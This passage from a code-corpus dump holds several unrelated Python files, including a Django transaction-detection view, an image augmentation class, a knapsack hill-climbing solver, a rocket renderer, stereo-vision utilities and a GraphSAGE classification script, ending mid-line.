userinfo_serializer.data, \\\n                'transaction': paginator.get_paginated_response(transaction_serializer.data).data, \\\n                }, \"error\": None}, status=status.HTTP_200_OK)\n\n        except UserInfo.DoesNotExist:\n            # Invalid URL (UID not present in user_info)\n            return Response({\"result\": None, \"error\": \"No UID matches the given query.\"}, \\\n                            status=status.HTTP_404_NOT_FOUND)\n\n        except Exception as e:\n            # Handle any other exception\n            return Response({\"result\": None, \"error\": str(e)}, \\\n                            status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n\n    def post(self, request, pk=None):\n        serializer = TransactionSerializer(data=request.data)\n        if serializer.is_valid():\n            # serializer.save()\n\n            # Fetch the matching user data\n            try:\n                tran_use = UserInfo.objects.filter(uid=pk).values()[0]\n            except UserInfo.DoesNotExist:\n                # Invalid serializer format or URL (UID not present in user_info)\n                return Response({\"result\": None, \"error\": \"No UID matches the given query.\"},\n                                status=status.HTTP_404_NOT_FOUND)\n\n            # Transaction type\n            result = utd.predict_result(serializer.data)\n            if type(result) is dict:\n                # Invalid data format\n                return Response({\"result\": None, \"error\": result},\n                                status=status.HTTP_400_BAD_REQUEST)\n\n            # Whether the transaction is unusual\n            if tran_use[result] != 0:\n                detection_result = False\n            else:\n                detection_result = True\n\n            # Update UserInfo\n            tran_use[result] = tran_use[result]+1\n            get_uid = UserInfo.objects.get(uid=pk)\n\n            get_uid.c1 = tran_use[\"c1\"]\n            get_uid.c2 = tran_use[\"c2\"]\n            get_uid.c3 = tran_use[\"c3\"]\n            get_uid.c4 = tran_use[\"c4\"]\n            
get_uid.c5 = tran_use[\"c5\"]\n            get_uid.c6 = tran_use[\"c6\"]\n            get_uid.c7 = tran_use[\"c7\"]\n            get_uid.c8 = tran_use[\"c8\"]\n            get_uid.c9 = tran_use[\"c9\"]\n            get_uid.c10 = tran_use[\"c10\"]\n            get_uid.c11 = tran_use[\"c11\"]\n            get_uid.c12 = tran_use[\"c12\"]\n            get_uid.save()\n\n            # Add a Transaction record\n            Transaction.objects.create(bas_ym=serializer.data['bas_ym'], \\\n                                       age_dc=serializer.data['age_dc'], \\\n                                       gender=serializer.data['gender'], \\\n                                       bas_dt=serializer.data['bas_dt'], \\\n                                       tran_md=serializer.data['tran_md'], \\\n                                       ats_kdcd_dtl=serializer.data['ats_kdcd_dtl'], \\\n                                       dps_trn_am=serializer.data['dps_trn_am'], \\\n                                       text_1=serializer.data['text_1'], \\\n                                       user_info_uid=get_uid, \\\n                                       result=result)\n\n            # Normal operation\n            return Response({\"result\": detection_result, \"error\": None}, status=status.HTTP_201_CREATED)\n\n        else:\n            # Invalid key or value (serializer)\n            return Response({\"result\": None, \"error\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"whfh3900/real","sub_path":"api/un_tran_report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"22460993061","text":"import warnings\nfrom copy import deepcopy\n\nimport mmcv\n\nfrom easycv.datasets.registry import PIPELINES\nfrom easycv.datasets.shared.pipelines import Compose\n\n\n@PIPELINES.register_module()\nclass MultiScaleFlipAug3D(object):\n    \"\"\"Test-time augmentation with multiple scales and flipping.\n\n    Args:\n        transforms (list[dict]): Transforms to apply in each augmentation.\n        img_scale (tuple | list[tuple]): Image scales for resizing.\n        pts_scale_ratio (float | list[float]): Points scale ratios for\n            resizing.\n        flip (bool, optional): Whether to apply flip augmentation.\n            Defaults to False.\n        flip_direction (str | list[str], optional): Flip augmentation\n            directions for images, options are \"horizontal\" and \"vertical\".\n            If flip_direction is list, multiple flip augmentations will\n            be applied. It has no effect when ``flip == False``.\n            Defaults to \"horizontal\".\n        pcd_horizontal_flip (bool, optional): Whether to apply horizontal\n            flip augmentation to point cloud. Defaults to False.\n            Note that it works only when 'flip' is turned on.\n        pcd_vertical_flip (bool, optional): Whether to apply vertical flip\n            augmentation to point cloud. 
Defaults to False.\n            Note that it works only when 'flip' is turned on.\n    \"\"\"\n\n    def __init__(self,\n                 transforms,\n                 img_scale,\n                 pts_scale_ratio,\n                 flip=False,\n                 flip_direction='horizontal',\n                 pcd_horizontal_flip=False,\n                 pcd_vertical_flip=False):\n        self.transforms = Compose(transforms)\n        self.img_scale = img_scale if isinstance(img_scale,\n                                                 list) else [img_scale]\n        self.pts_scale_ratio = pts_scale_ratio \\\n            if isinstance(pts_scale_ratio, list) else [float(pts_scale_ratio)]\n\n        assert mmcv.is_list_of(self.img_scale, tuple)\n        assert mmcv.is_list_of(self.pts_scale_ratio, float)\n\n        self.flip = flip\n        self.pcd_horizontal_flip = pcd_horizontal_flip\n        self.pcd_vertical_flip = pcd_vertical_flip\n\n        self.flip_direction = flip_direction if isinstance(\n            flip_direction, list) else [flip_direction]\n        assert mmcv.is_list_of(self.flip_direction, str)\n        if not self.flip and self.flip_direction != ['horizontal']:\n            warnings.warn(\n                'flip_direction has no effect when flip is set to False')\n        if (self.flip and not any([(t['type'] == 'RandomFlip3D'\n                                    or t['type'] == 'RandomFlip')\n                                   for t in transforms])):\n            warnings.warn(\n                'flip has no effect when RandomFlip is not in transforms')\n\n    def __call__(self, results):\n        \"\"\"Call function to augment common fields in results.\n\n        Args:\n            results (dict): Result dict contains the data to augment.\n\n        Returns:\n            dict: The result dict contains the data that is augmented with\n                different scales and flips.\n        \"\"\"\n        aug_data = []\n\n        # modified from `flip_aug = [False, True] if self.flip else [False]`\n        # to reduce unnecessary scenes when using double flip augmentation\n        # during test time\n        flip_aug = [True] if self.flip else [False]\n        pcd_horizontal_flip_aug = [False, True] \\\n            if self.flip and self.pcd_horizontal_flip else [False]\n        pcd_vertical_flip_aug = [False, True] \\\n            if self.flip and self.pcd_vertical_flip else [False]\n        for scale in self.img_scale:\n            for pts_scale_ratio in self.pts_scale_ratio:\n                for flip in flip_aug:\n                    for pcd_horizontal_flip in pcd_horizontal_flip_aug:\n                        for pcd_vertical_flip in pcd_vertical_flip_aug:\n                            for direction in self.flip_direction:\n                                # results.copy would cause a bug\n                                # since it is a shallow copy\n                                _results = deepcopy(results)\n                                _results['scale'] = scale\n                                _results['flip'] = flip\n                                _results['pcd_scale_factor'] = \\\n                                    pts_scale_ratio\n                                _results['flip_direction'] = direction\n                                _results['pcd_horizontal_flip'] = \\\n                                    pcd_horizontal_flip\n                                _results['pcd_vertical_flip'] = \\\n                                    pcd_vertical_flip\n                                data = self.transforms(_results)\n                                aug_data.append(data)\n        # list of dict to dict of list\n        aug_data_dict = {key: [] for key in aug_data[0]}\n        for data in aug_data:\n            for key, val in data.items():\n                aug_data_dict[key].append(val)\n        return aug_data_dict\n\n    def __repr__(self):\n        \"\"\"str: Return a string that describes the module.\"\"\"\n        repr_str = self.__class__.__name__\n        repr_str += f'(transforms={self.transforms}, '\n        repr_str += f'img_scale={self.img_scale}, flip={self.flip}, '\n        repr_str += f'pts_scale_ratio={self.pts_scale_ratio}, '\n        repr_str += f'flip_direction={self.flip_direction})'\n        return repr_str\n","repo_name":"alibaba/EasyCV","sub_path":"easycv/datasets/detection3d/pipelines/test_aug.py","file_name":"test_aug.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","stars":1565,"dataset":"github-code","pt":"60"}
{"seq_id":"5849890837","text":"mes1= 31\nmes2= 28\nmes3= 30\n\ndiaMes=[31,28,31,30,31,30,31,31,30,31,30,31]\nn = input(\"What's your name? 
\")\nprint(\"hola, \",n)\n\nstrEdad= input(\"¿que edad tienes? \")\nstrYear= input(\"¿en que años estamos?\")\nstrMes= input(\"¿en que mes estamos?\")\nstrDia= input(\"¿en que día estamos\")\n\nedad=int(strEdad)\nyear=int(strYear)\nmes= int (strMes)\ndia= int (strDia)\n\nindice= 0\ntranscurrido=0\n\n\nwhile indice < mes-1:\n transcurrido = transcurrido + diaMes[indice]\n indice= indice + 1 \n \n\ntranscurrido += dia\n \nprob = (transcurrido / 365) * 100\n\nnacimiento = year - edad\n\nprint (n, \"nacistes en \" , nacimiento, \" con una probabilidad de:\", prob)\n\nprint (\" o en \", nacimiento -1, \" con una probabilidad del \", 100-prob) \n \n \n ","repo_name":"jorgesanme/Python","sub_path":"Ejercicios/keepcoding/nombre.py","file_name":"nombre.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31354375233","text":"#generador de variables random\nimport random\n\n# Función evaluar calcula el valor total de los objetos seleccionados y compara si el peso total de estos no supera el peso total máximo\ndef evaluate(items, knapsack_weight, solution):\n total_value = 0 #inicializamo el valor\n total_weight = 0 #inicializamos peso\n for i in range(len(items)): #seleccion de los objetos\n if solution[i] == 1: # itera sobre la lista \"solution\" y, para cada elemento de la lista, se comprueba si la solución correspondiente para ese objeto es 1.\n total_value += items[i][0] \n total_weight += items[i][1]\n if total_weight > knapsack_weight: # si el peso total es mayor que el de la mochila se devuelve una lista con dos valores: 0 y el peso total. \n return [0, total_weight] \n else:\n return (total_value, total_weight)\n \n\n# Función vecino: genera una solución vecina a la sol actual,\ndef generate_neighbor(solution):\n neighbor = solution[:] # primero crea una copia de la solución dada y la almacena en una nueva lista llamada \"neighbor\"\n i = random.randint(0, len(solution)-1) # se selecciona un índice al azar en la lista \"solution\" utilizando la función \"random.randint\" de la biblioteca \"random\".\n neighbor[i] = 1 - neighbor[i] # el valor en la posición seleccionada se invierte, cambiando de 0 a 1 o de 1 a 0, y se devuelve la lista \"neighbor\".\n return neighbor\n\n# Inicializar la solución: inicializa la solucion al azar\ndef initialize_solution(n):\n return [random.randint(0,1) for i in range(n)]\n\n#Algoritmo de Hill climbing: genera soluciones vecinas, evaluza las puntuaciones y act la sol actual si encuentra una sol vecina mejor.\ndef hill_climbing(items, knapsack_weight, n_iter):\n current_solution = initialize_solution(len(items))\n current_value, total_weight = evaluate(items, knapsack_weight, current_solution) #obtener la knapsack_weight con cada iteración y la mejor solución presente\n print(\"El valor actual es: \" + str(current_value) +\" con peso un peso de: \"+str(total_weight))\n for i in range (n_iter): # La función \"range (n_iter)\" genera una secuencia de números enteros desde 0 hasta n_iter-1, y el bucle \"for\" itera sobre esta secuencia.\n neighbor = generate_neighbor(current_solution) # genera vecino mas cercano a la solucion.\n neighbor_value, total_weight = evaluate(items, knapsack_weight, neighbor) # el valor del vecino y el peso de la mochila seran evaluados a partir de los que ya tenemos.\n if neighbor_value > current_value: # si el calor del vecino es mayor al valor actual\n current_value = neighbor_value # se actualiza el valor actual a la solucion vecina.\n 
current_solution = neighbor  # and adopt the neighbor as the current solution\n            print(\"At iteration: \" + str(i) + \" chose: \" + str(current_solution) + \" with a value of: \" + str(current_value) + \" and a weight of: \" + str(total_weight))\n    return current_solution, current_value  # return the current solution and its value\n\n\n# example usage with predefined items and knapsack weight\nitems = [[4,12],[2,1],[2,2],[1,1],[10,4]]\nknapsack_weight = 10\nsolution, value = hill_climbing(items, knapsack_weight,10)\nprint(\"Selected items:\", [items[i] for i in range(len(items)) if solution[i] == 1])\nprint(\"Total value:\", value)  # solution value and weight","repo_name":"Martinhh13/Sistemas-inteligentes","sub_path":"MochilaHill.py","file_name":"MochilaHill.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"4256264734","text":"import cv2\nimport numpy as np\nimport config as cfg\nfrom utils import *\n\nclass Renderer:\n\tdef __init__(self):\n\t\tself.canvas = np.zeros((cfg.CANVAS_H, cfg.CANVAS_W, 3)).astype(\"uint8\")\n\t\tself.rocket_body = np.array([\n\t\t\t\t\t\t\t\t[-30, -15],\n\t\t\t\t\t\t\t\t[ 30, -15],\n\t\t\t\t\t\t\t\t[ 30, 15],\n\t\t\t\t\t\t\t\t[-30, 15]\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.rocket_top = np.array([\n\t\t\t\t\t\t\t\t[-30, -15],\n\t\t\t\t\t\t\t\t[ 0, -40],\n\t\t\t\t\t\t\t\t[ 30, -15],\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.thruster_pts = np.array([\n\t\t\t\t\t\t\t\t[-5, -5],\n\t\t\t\t\t\t\t\t[ 0, -10],\n\t\t\t\t\t\t\t\t[ 5, -5],\n\t\t\t\t\t\t\t\t[ 5, 30],\n\t\t\t\t\t\t\t\t[-5, 30]\n\t\t\t\t\t\t\t\t\t])\n\n\t\tself.fire_pts = np.array([\n\t\t\t\t\t\t\t\t[-5, 30],\n\t\t\t\t\t\t\t\t[ 0, 30],\n\t\t\t\t\t\t\t\t[ 5, 30],\n\t\t\t\t\t\t\t\t[ 0, 30]\n\t\t\t\t\t\t\t\t])\n\n\n\t\tself.lander_pts = np.array([\n\t\t\t\t\t\t\t\t[-20, 15],\n\t\t\t\t\t\t\t\t[ 20, 15],\n\t\t\t\t\t\t\t\t[ 40, 40],\n\t\t\t\t\t\t\t\t[-20, 15],\n\t\t\t\t\t\t\t\t[-40, 40],\n\t\t\t\t\t\t\t\t[ 20, 15]\n\t\t\t\t\t\t\t\t\t])\n\t\n\n\tdef draw_flame_shade(self, rocket, left_thruster_angle, right_thruster_angle, flame_type = 1):\n\t\tif flame_type == 2:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 2\n\t\t\tmultiplier3 = 0.15\n\t\t\tflame_color = rocket.fire_color2\n\t\telif flame_type == 3:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 1.5\n\t\t\tmultiplier3 = 0.1\n\t\t\tflame_color = rocket.fire_color3\n\t\telse:\n\t\t\tmultiplier1 = 0.2\n\t\t\tmultiplier2 = 3\n\t\t\tmultiplier3 = 0.2\n\t\t\tflame_color = rocket.fire_color1\n\n\t\tright_thruster_fire_pts = self.fire_pts.copy()\n\t\tright_thruster_fire_pts[0, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier1\n\t\tright_thruster_fire_pts[2, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier1\n\t\tright_thruster_fire_pts[3, 1] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier2\n\n\t\tright_thruster_fire_pts[0, 0] += rocket.thruster_right_force_world_frame.get_magnitude()*multiplier3\n\t\tright_thruster_fire_pts[2, 0] -= rocket.thruster_right_force_world_frame.get_magnitude()*multiplier3\n\n\t\tright_thruster_fire_pts = get_transformed_pts(right_thruster_fire_pts, \n\t\t\t\t\t\t\tright_thruster_angle, \n\t\t\t\t\t\t\trocket.right_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [right_thruster_fire_pts], True, flame_color, 1)\n\t\tcv2.fillPoly(self.canvas, [right_thruster_fire_pts], flame_color)\n\n\n\t\tleft_thruster_fire_pts = self.fire_pts.copy()\n\t\tleft_thruster_fire_pts[0, 1] += 
rocket.thruster_left_force_world_frame.get_magnitude()*multiplier1\n\t\tleft_thruster_fire_pts[2, 1] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier1\n\t\tleft_thruster_fire_pts[3, 1] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier2\n\n\t\tleft_thruster_fire_pts[0, 0] += rocket.thruster_left_force_world_frame.get_magnitude()*multiplier3\n\t\tleft_thruster_fire_pts[2, 0] -= rocket.thruster_left_force_world_frame.get_magnitude()*multiplier3\n\t\tleft_thruster_fire_pts = get_transformed_pts(left_thruster_fire_pts, \n\t\t\t\t\t\t\tleft_thruster_angle, \n\t\t\t\t\t\t\trocket.left_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [left_thruster_fire_pts], True, flame_color, 1)\n\t\tcv2.fillPoly(self.canvas, [left_thruster_fire_pts], flame_color)\n\n\tdef draw_flames(self, rocket, left_thruster_angle, right_thruster_angle):\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 1)\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 2)\n\t\tself.draw_flame_shade(rocket, left_thruster_angle, right_thruster_angle, flame_type = 3)\n\n\tdef draw_thrusters(self, rocket):\n\t\tleft_thruster_angle = rocket.thruster_left_force_world_frame.get_angle() + np.pi/2\n\t\tleft_thruster_pts = get_transformed_pts(self.thruster_pts, \n\t\t\t\t\t\t\tleft_thruster_angle, \n\t\t\t\t\t\t\trocket.left_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [left_thruster_pts], True, rocket.thruster_color, 2)\n\t\tcv2.fillPoly(self.canvas, [left_thruster_pts], rocket.thruster_color)\n\n\t\tright_thruster_angle = rocket.thruster_right_force_world_frame.get_angle() + np.pi/2\n\t\tright_thruster_pts = get_transformed_pts(self.thruster_pts, \n\t\t\t\t\t\t\tright_thruster_angle, \n\t\t\t\t\t\t\trocket.right_thruster_pos, position_vector = False)\n\t\t# cv2.polylines(self.canvas, [right_thruster_pts], True, rocket.thruster_color, 2)\n\t\tcv2.fillPoly(self.canvas, [right_thruster_pts], rocket.thruster_color)\n\n\t\tself.draw_flames(rocket, left_thruster_angle, right_thruster_angle)\n\n\t\tpt1 = (int(rocket.pos.x - cfg.ROCKET_W//2), int(rocket.pos.y - cfg.ROCKET_H//2))\n\t\tpt2 = (int(rocket.pos.x + cfg.ROCKET_W//2), int(rocket.pos.y + cfg.ROCKET_H//2))\n\t\tcv2.rectangle(self.canvas, pt1, pt2, (0, 255, 0), 1)\n\n\n\tdef draw(self, rocket):\n\t\tbody_pts = get_transformed_pts(self.rocket_body, rocket.orientation, rocket.pos)\n\t\t# cv2.polylines(self.canvas, [body_pts], True, rocket.color, 2)\n\t\tif rocket.top_g:\n\t\t\tcv2.fillPoly(self.canvas, [body_pts], rocket.color_w)\n\t\telse:\n\t\t\tcv2.fillPoly(self.canvas, [body_pts], rocket.color)\n\t\t\n\t\ttop_pts = get_transformed_pts(self.rocket_top, rocket.orientation, rocket.pos)\n\t\t# cv2.polylines(self.canvas, [top_pts], True, rocket.top_color, 2)\n\t\tcv2.fillPoly(self.canvas, [top_pts], rocket.top_color)\n\n\t\tlander_pts = get_transformed_pts(self.lander_pts, rocket.orientation, rocket.pos)\n\t\tcv2.polylines(self.canvas, [lander_pts], False, rocket.lander_color, 2)\n\n\t\t# cv2.polylines(self.canvas, [rocket.tail.astype(\"int\")], False, rocket.lander_color, 1)\n\t\tself.draw_thrusters(rocket)\n\t\tpt = (int(rocket.pos.x), int(rocket.pos.y))\n\t\tcv2.circle(self.canvas, (rocket.goal[0], rocket.goal[1]), 5, (0, 255, 0), -1)\n\n\n\n\tdef render(self):\n\t\tcv2.imshow(\"canvas\", self.canvas)\n\t\treturn cv2.waitKey(1)\n\n\tdef clear(self):\n\t\tself.canvas = np.zeros((cfg.CANVAS_H, cfg.CANVAS_W, 
3)).astype(\"uint8\")","repo_name":"zainkhan-afk/Rocket-Lander","sub_path":"renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"42815569466","text":"def get_formatted_name(first,last,middle = ''):\n\tif middle:\n\t\tfull_name = f\"{first} {middle} {last}\"\n\telse:\n\t\tfull_name = f\"{first} {last}\"\n\treturn full_name.title()\n\nimport unittest\n\nclass NameTestCase(unittest.TestCase):\n\tdef test_first_last_name(self):\n\t\tformatted_name = get_formatted_name('jains','joplin')\n\t\tself.assertEqual(formatted_name,'Jains Joplin')\n\tdef test_first_last_middle_name(self):\n\t\tformatted_name = get_formatted_name('wolfgang','mozart','amadeus')\n\t\tself.assertEqual(formatted_name,'Wolfgang Amadeus Mozart')\n\nif __name__ ==\"__main__\":\n\tunittest.main()\n","repo_name":"NULL-2019/L_22_9_torch_python","sub_path":"Lpython/ch11.py","file_name":"ch11.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"38605611955","text":"import argparse\nimport itertools\nimport os\nimport os.path\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\ndef main(good, bad, sample):\n    good = [os.path.join(good, f) for f in os.listdir(good)\n            if os.path.isfile(os.path.join(good, f))]\n    bad = [os.path.join(bad, f) for f in os.listdir(bad)\n           if os.path.isfile(os.path.join(bad, f))]\n\n    tfidf_good = TfidfVectorizer().fit_transform(\n        [open(f, errors='ignore').read()\n         for f in itertools.chain(good, [sample])])\n\n    tfidf_bad = TfidfVectorizer().fit_transform(\n        [open(f, errors='ignore').read()\n         for f in itertools.chain(bad, [sample])])\n\n    sim_good = cosine_similarity(tfidf_good[-1], tfidf_good)\n    sim_bad = cosine_similarity(tfidf_bad[-1], tfidf_bad)\n\n    index_good = sim_good.argsort()[0][-2]\n    index_bad = sim_bad.argsort()[0][-2]\n\n    print('Maximum similarity with good samples: {}'.format(sim_good[0][index_good]))\n    print('Maximum similarity with bad samples: {}'.format(sim_bad[0][index_bad]))\n    print('Similar document: {}'.format(\n        good[index_good]\n        if sim_good[0][index_good] >= sim_bad[0][index_bad]\n        else bad[index_bad]))\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Basic cosine similarity comparator.')\n    parser.add_argument('--good', help='directory where the good samples are')\n    parser.add_argument('--bad', help='directory where the bad samples are')\n    parser.add_argument('sample', help='file to compare with')\n\n    args = parser.parse_args()\n\n    if not args.good or not args.bad:\n        print('Provide directory path for good and bad samples')\n        exit(1)\n\n    main(args.good, args.bad, args.sample)\n","repo_name":"aplanas/cossim","sub_path":"cossim.py","file_name":"cossim.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"12548426531","text":"import os\nimport cv2\nimport numpy as np\nimport re\nfrom components.utils.CSVWriter2 import Wrapper as csv\n\ndef get_last_saved_image_id(path):\n    paths = os.scandir(path)\n    paths_stringified = sorted([p.name for p in paths])\n    if len(paths_stringified) == 0:\n        return 1\n    temp = paths_stringified[-1].split(\".\")[0][-4:]\n    return int(temp)+1\n\ndef save_disparity(path, disp):\n    experiment_title = os.path.split(path)[-1]\n    if not os.path.isdir(path):\n        
os.makedirs(path)\n counter = get_last_saved_image_id(path)\n filename = \"{exp_title}_{counter:04d}.png\".format(exp_title=experiment_title, counter=counter)\n fqn = os.path.join(path, filename)\n cv2.imwrite(fqn, disp)\n return fqn\n\ndef getNextFileName(test_folder =\"./test_outputs\", image_extension=\".png\", pre=\"test_disparity\"):\n counter = 1\n full_filename = pre + str(counter) + image_extension\n\n while os.path.isfile(os.path.join(test_folder, full_filename)):\n counter += 1\n full_filename = pre + str(counter) + image_extension\n return os.path.join(test_folder, full_filename)\n\ndef executeParallelMatching(initializedMatcher):\n result = initializedMatcher.alignImagesParallel()\n initializedMatcher.recompileObject(result)\n initializedMatcher.generateDisparity()\n return initializedMatcher\n\ndef saveTwoImages(img1, img2, test_folder =\"./test_outputs\", image_extension=\".png\", pre=\"test_disparity\"):\n fname = getNextFileName(test_folder , image_extension, pre)\n success1 = cv2.imwrite(fname, img1)\n if(success1):\n print(\"File has been successfully written to path: %s\"%(fname))\n fname = getNextFileName(test_folder , image_extension, pre)\n success2 = cv2.imwrite(fname, img2)\n if (success2):\n print(\"File has been successfully written to path: %s\"%(fname))\n return success1 and success2\n\n# Adapted from: https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python\n\ndef gaussian_kernel(dimension_x, dimension_y, sigma_x, sigma_y):\n x = cv2.getGaussianKernel(dimension_x, sigma_x)\n y = cv2.getGaussianKernel(dimension_y, sigma_y)\n kernel = x.dot(y.T)\n return kernel\n\ndef getHorizontalFeatureFilter(convolver):\n filter = np.zeros([3,3])\n filter[0, :] =1\n filter[2, :] = -1\n convolver.setFilter(filter)\n\ndef getVerticalFeatureFilter(convolver):\n filter = np.zeros([3, 3])\n filter[:, 0] = 1\n filter[:, 2] = -1\n convolver.setFilter(filter)\n\ndef getFilterByTypo(convolver):\n filter = np.zeros([3, 3])\n filter[:, 0] = 1\n filter[2, :] = -1\n convolver.setFilter(filter)\ndef add_occlusions(img, occlusions):\n masked = np.where(occlusions==0, 0, img)\n return masked\n\n\ndef apply_demo_filters(loaded_imgs):\n from components.utils import SimpleConvolution as SC\n\n convolver = SC.getOne()\n im2 = loaded_imgs[0]\n im6 = loaded_imgs[1]\n\n im2_blurred = convolver.convolve(im2)\n im6_blurred = convolver.convolve(im6)\n\n getHorizontalFeatureFilter(convolver)\n\n\n im2_h = convolver.convolve(im2)\n im6_h = convolver.convolve(im6)\n\n getVerticalFeatureFilter(convolver)\n\n im2_v = convolver.convolve(im2)\n im6_v = convolver.convolve(im6)\n\n getFilterByTypo(convolver)\n\n im2_t = convolver.convolve(im2)\n im6_t = convolver.convolve(im6)\n\n im2_features_added = im2 + im2 + im2_h + im2_t\n im6_features_added = im6 + im6 + im6_h + im6_t\n\n im2s = [im2, im2_blurred, im2_h, im2_v, im2_t, im2_features_added]\n im6s = [im6, im6_blurred, im6_h, im6_v, im6_t, im6_features_added]\n\n return im2s, im6s\n\n# adapted from https://gist.github.com/chpatrick/8935738\ndef load_pfm(file, remove_inf = True):\n file = open(file, 'rb')\n color = None\n width = None\n height = None\n scale = None\n endian = None\n\n header = file.readline().decode('utf-8').rstrip()\n if header == 'PF':\n color = True\n elif header == 'Pf':\n color = False\n else:\n raise Exception('Not a PFM file.')\n dim_line = file.readline().decode('utf-8').strip()\n dims_found = dim_line.split(\" \")\n width, height = map(int, dims_found)\n scale_line = 
file.readline().decode('utf-8').rstrip()\n    scale = float(scale_line)\n    if scale < 0: # little-endian\n        endian = '<'\n        scale = -scale\n    else:\n        endian = '>' # big-endian\n\n    data = np.fromfile(file, endian + 'f').astype(np.float64)\n    shape = (height, width, 3) if color else (height, width)\n    img = np.flip(np.reshape(data, shape), axis=0)\n    if(remove_inf):\n        img = np.where(img==np.inf, 0, img)\n    return img, scale\n\n","repo_name":"regorigregory/FYP_PUBLIC","sub_path":"components/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"42570537294","text":"import pdb\n\nimport sys\nsys.path.append(\"../\")\nfrom sklearn.ensemble import RandomForestClassifier\nfrom GraphSAGE_embedding.main import graphsage\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport utils.CommonUtils as CommonUtils\nimport FeatureExtractor.extractors as extractors\nfrom utils import NLPUtils, ClassificationReportAVG\nfrom sklearn.metrics import classification_report\n\n\ndef encode_onehot(label_num_map, labels):\n    classes_dict = {label: np.identity(len(label_num_map))[label_num_map[label], :] for label in label_num_map}\n    labels_onehot = np.array(list(map(classes_dict.get, labels)), dtype=np.int32)\n    return labels_onehot\n\n\ndef sample_mask(idx, l):\n    mask = np.zeros(l)\n    mask[idx] = 1\n    return np.array(mask, dtype=bool)\n\n\ndef get_splits(y, strategy=\"all\", sample_size=200):\n    '''\n    Split the dataset\n    '''\n    idx_set = []\n    for i in range(y.shape[1]):\n        idx_set.append([])\n\n    for i, label in enumerate(y):\n        label = np.argmax(label)\n        idx_set[label].append(i)\n\n    idx_train = []\n    idx_val = []\n    idx_test = []\n\n    for s in idx_set:\n        # np.random.seed(1234)\n        np.random.shuffle(s)\n        if strategy == \"all\":\n            idx_train = idx_train + s[0:int(len(s) * 0.7)]\n            idx_val = idx_val + s[int(len(s) * 0.7):]\n            idx_test = idx_test + s[int(len(s) * 0.8):]\n            # idx_train = idx_train + s[int(len(s)*0.5):]\n            # idx_val = idx_val + s[int(len(s) * 0.3):int(len(s) * 0.5)]\n            # idx_test = idx_test + s[:int(len(s) * 0.5)]\n        elif strategy == \"sample\":\n            idx_train = idx_train + s[0:sample_size]\n            idx_val = idx_val + s[int(len(s) * 0.8):]\n            idx_test = idx_test + s[sample_size:]\n\n    print(\"Sample counts train: {}, val: {}, test: {}\".format(len(idx_train), len(idx_val), len(idx_test)))\n\n    y_train = np.zeros(y.shape, dtype=np.int32)\n    y_val = np.zeros(y.shape, dtype=np.int32)\n    y_test = np.zeros(y.shape, dtype=np.int32)\n    y_train[idx_train] = y[idx_train]\n    y_val[idx_val] = y[idx_val]\n    y_test[idx_test] = y[idx_test]\n    train_mask = sample_mask(idx_train, y.shape[0])\n    val_mask = sample_mask(idx_val, y.shape[0])\n    test_mask = sample_mask(idx_test, y.shape[0])\n\n    return y_train, y_val, y_test, train_mask, val_mask, test_mask\n\nreports = []\nfor _ in range(5):\n    df_data = pd.read_csv('../output/datasource_1228_without_isolate_node.csv')\n    num_label_map, label_num_map = CommonUtils.get_num_label_map(df_data[\"label\"])\n    onehot_labels = encode_onehot(label_num_map, list(df_data[\"label\"]))\n    y_train, y_val, y_test, train_mask, val_mask, test_mask = get_splits(onehot_labels)\n    y_train = [np.argmax(y) for y in y_train[train_mask]]\n    y_test = [np.argmax(y) for y in y_test[test_mask]]\n\n\n    # texts = list(df_data[\"text\"].apply(lambda x: NLPUtils.preprocess_text(x)))\n    # embedding = extractors.tfidf_feat_extractor(texts)\n    sage = graphsage()\n    embedding = sage.exec()\n    clf = 
